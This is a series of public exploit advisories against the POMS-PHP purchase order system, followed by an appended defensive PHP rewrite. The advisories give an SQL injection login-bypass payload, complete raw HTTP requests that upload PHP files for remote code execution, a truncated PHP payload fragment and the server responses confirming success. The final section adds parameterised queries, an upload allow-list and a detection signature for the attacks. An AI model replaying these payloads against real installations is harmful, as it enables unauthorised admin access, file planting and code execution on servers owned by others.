## Titles: POMS-PHP-(by oretnom23 )-v1.0-FU-SQLi-RCE-HAT.TRICK

1. SQLi Bypass Authentication
2. File Upload
3. RCE

## Latest update from the vendor: 5 hours 32 minutes ago

## Author: nu11secur1ty

## Date: 05/07/2024

## Vendor: https://github.com/oretnom23

## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html

## Reference: https://portswigger.net/web-security/sql-injection, https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/authentication

## Description:

SQLi-Bypass-Authentication: The `username` parameter is not sanitized properly, so an attacker can bypass authentication and log in to the system.

---------------------------------------------------------------------------------------------------------------------------------------

FU: Using this vulnerability, the attacker can upload any PHP file to the server. The parameter id="cimg" is not sanitized securely.

STATUS: CRITICAL- Vulnerability

---------------------------------------------------------------------------------------------------------------------------------------

RCE: The attacker can upload a malicious file with hazardous content, then use it to create another file on the server.

STATUS: CRITICAL- Vulnerability

[+]Exploits:

- SQLi bypass authentication:

```mysql
nu11secur1ty' or 1=1#
```

- FU:

```
```

- RCE:

```
Hello, you are hacked by Fileupload and RCE!');
fclose($fh);
//unlink('test.html');
?>
```

## Reproduce:

[href](https://www.patreon.com/posts/poms-php-by-v1-0-103786653)

## Proof and Exploit:

[href](https://www.nu11secur1ty.com/2024/05/poms-php-by-oretnom23-v10-fu-sqli-rce.html)

## Time spent: 00:35:00

## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - SQLi Bypass Authentication

## Author: nu11secur1ty

## Date: 11/08/2024

## Vendor: https://github.com/oretnom23

## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette

## Reference: https://portswigger.net/web-security/sql-injection

## Description:

The `username` parameter is vulnerable to SQLi authentication bypass. This makes it easy for malicious users to log in to this system, obtain sensitive information, or, worse, destroy it very easily!

STATUS: HIGH- Vulnerability

[+]Exploit:

- SQLi:

```http
POST /purchase_order/classes/Login.php?f=login HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 44
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/login.php
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

username=nu11secur1ty' or 1=1#&password=sada
```

[+]Response:

```http
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:08:35 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

{"status":"success"}
```

## Reproduce:

[href](https://www.youtube.com/watch?v=wG60bjiFN7o)

## Demo PoC:

[href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright.html)

## Time spent: 00:05:00

## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit

## Author: nu11secur1ty

## Date: 11/08/2024

## Vendor: https://github.com/oretnom23

## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette

## Reference: https://portswigger.net/web-security/file-upload

## Description:

The `img` parameter is vulnerable to an unrestricted file upload. This makes it easy for malicious, already logged-in users of this system to obtain sensitive information, or, worse, destroy it very easily!

STATUS: HIGH- Vulnerability

[+]Exploit:

```http
POST /purchase_order/classes/Users.php?f=save HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 709
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/?page=user
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="firstname"

Adminstrator
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="lastname"

Admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream

------WebKitFormBoundaryoIjZa6BqBYZRIp8V--
```

[+]Response:

```http
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:52:20 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

1
```

## Reproduce:

[href](https://www.youtube.com/watch?v=XODY8SSz62c)

## Demo PoC:

[href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html)

## Time spent: 00:05:00

## Titles: POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - Remote Code Execution Vulnerability exploit

## Author: nu11secur1ty

## Date: 11/08/2024

## Vendor: https://github.com/oretnom23

## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette

## Reference: https://portswigger.net/web-security/file-upload

## Description:

The `img` parameter is vulnerable to Remote Code Execution (RCE). This makes it easy for malicious, already logged-in users of this system to obtain sensitive information, or, worse, destroy it very easily by executing the already uploaded malicious file! In my case, I executed it directly from the remote browser, creating a malicious HTML file on the vulnerable server. This could be a web socket or any malicious code. It depends on the scenario!

STATUS: HIGH- Vulnerability

[+]Exploit:

```http
POST /purchase_order/classes/Users.php?f=save HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=qkjnqf44841cts24ktnb7jr3dg
Content-Length: 866
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1ICMb0SCiZtfFsS8
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/?page=user
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundary1ICMb0SCiZtfFsS8
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundary1ICMb0SCiZtfFsS8
Content-Disposition: form-data; name="firstname"

Adminstrator
------WebKitFormBoundary1ICMb0SCiZtfFsS8
Content-Disposition: form-data; name="lastname"

Admin
------WebKitFormBoundary1ICMb0SCiZtfFsS8
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundary1ICMb0SCiZtfFsS8
Content-Disposition: form-data; name="password"

------WebKitFormBoundary1ICMb0SCiZtfFsS8
Content-Disposition: form-data; name="img"; filename="1nsi1deyou.php"
Content-Type: application/octet-stream

Hello, you are hacked by Fileupload and RCE!');
fclose($fh);
//unlink('test.html');
?>
------WebKitFormBoundary1ICMb0SCiZtfFsS8--
```

[+]Response:

```http
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 09:15:18 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

1
```

## Reproduce:

[href](https://youtu.be/7DHoO9EoZEM?si=sff7c22H_bfyLNad)

## Demo PoC:

[href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_18.html)

## Time spent: 00:05:00
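As an added example (not code from this advisory or from the POMS-PHP project), the two handlers the findings above target, `Login.php?f=login` and `Users.php?f=save`, rewritten the way a defender would: a parameterised login for the SQLi finding, and an upload routine for the file-upload and RCE findings that rejects `info.php`/`1nsi1deyou.php`-style files before anything is written under the web root. The function names, the `users` table and its `username`/`password` columns, the `$uploadDir` location and the SQLite self-check data are assumptions made for illustration.

```php
<?php
// Added example, not part of the advisory or the POMS-PHP code base.
// Table, column, function and directory names below are assumptions.
declare(strict_types=1);

/**
 * Login with a bound parameter. The username is sent to the database as
 * data, so a value like "nu11secur1ty' or 1=1#" is compared literally
 * against the column and can no longer rewrite the WHERE clause.
 */
function login_user(PDO $pdo, string $username, string $password): bool
{
    $stmt = $pdo->prepare(
        'SELECT id, password FROM users WHERE username = :username LIMIT 1'
    );
    $stmt->execute([':username' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // The column is assumed to hold a password_hash() digest, never plaintext.
    if ($row === false || !password_verify($password, $row['password'])) {
        return false;
    }
    if (session_status() === PHP_SESSION_ACTIVE) {
        session_regenerate_id(true);            // no session fixation across login
        $_SESSION['user_id'] = (int) $row['id'];
    }
    return true;
}

/**
 * Store an uploaded profile image. Defences, in order:
 *   1. allow-list of image extensions (rejects "info.php" outright)
 *   2. sniffed MIME type must match the extension (rejects a PHP file renamed .png)
 *   3. the bytes must decode as an image
 *   4. the client filename is discarded; the server picks a random name
 * Returns the stored filename, or null when the upload is refused.
 */
function store_profile_image(array $file, string $uploadDir): ?string
{
    $allowed  = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
                 'png' => 'image/png',  'gif'  => 'image/gif'];
    $maxBytes = 2 * 1024 * 1024;

    if (!isset($file['error'], $file['tmp_name'], $file['name'], $file['size'])
        || $file['error'] !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])   // must come from this request
        || $file['size'] > $maxBytes) {
        return null;
    }

    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        return null;
    }

    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        return null;
    }
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }

    // Random, server-chosen name: no attacker-controlled characters reach the path.
    $newName = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest    = rtrim($uploadDir, '/') . '/' . $newName;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644);   // readable, never executable
    return $newName;      // persist this name, not $file['name']
}

// Self-check against an in-memory SQLite database (constructed sample data,
// assumes the pdo_sqlite extension is available on the command line).
if (PHP_SAPI === 'cli') {
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE, password TEXT)');
    $ins = $pdo->prepare('INSERT INTO users (username, password) VALUES (?, ?)');
    $ins->execute(['admin', password_hash('correct horse battery', PASSWORD_DEFAULT)]);

    var_dump(login_user($pdo, 'admin', 'correct horse battery'));        // valid credentials
    var_dump(login_user($pdo, "nu11secur1ty' or 1=1#", 'sada'));         // the advisory's payload
    var_dump(store_profile_image(['name' => 'info.php', 'tmp_name' => '/nonexistent',
                                  'size' => 10, 'error' => UPLOAD_ERR_OK], sys_get_temp_dir()));
}
```

The bound `:username` parameter alone is what closes the first finding: the advisory's payload is looked up as a literal string, no row matches, and the handler returns false instead of `{"status":"success"}`. For the upload and RCE findings each check in `store_profile_image` closes a different bypass, and the extension allow-list already refuses both captured requests, whose `filename` values end in `.php`. The remaining defence-in-depth step lives in the web server rather than in PHP: serve the upload directory with script execution disabled, for example `php_admin_flag engine off` inside an Apache `<Directory>` block for it, so that even a file that slips through is returned as bytes rather than run. The captured requests also give a simple detection signature for logs or a WAF: a login POST whose body contains `' or 1=1`, or a multipart part with `name="img"` whose `filename` ends in `.php` and whose part `Content-Type` is `application/octet-stream`.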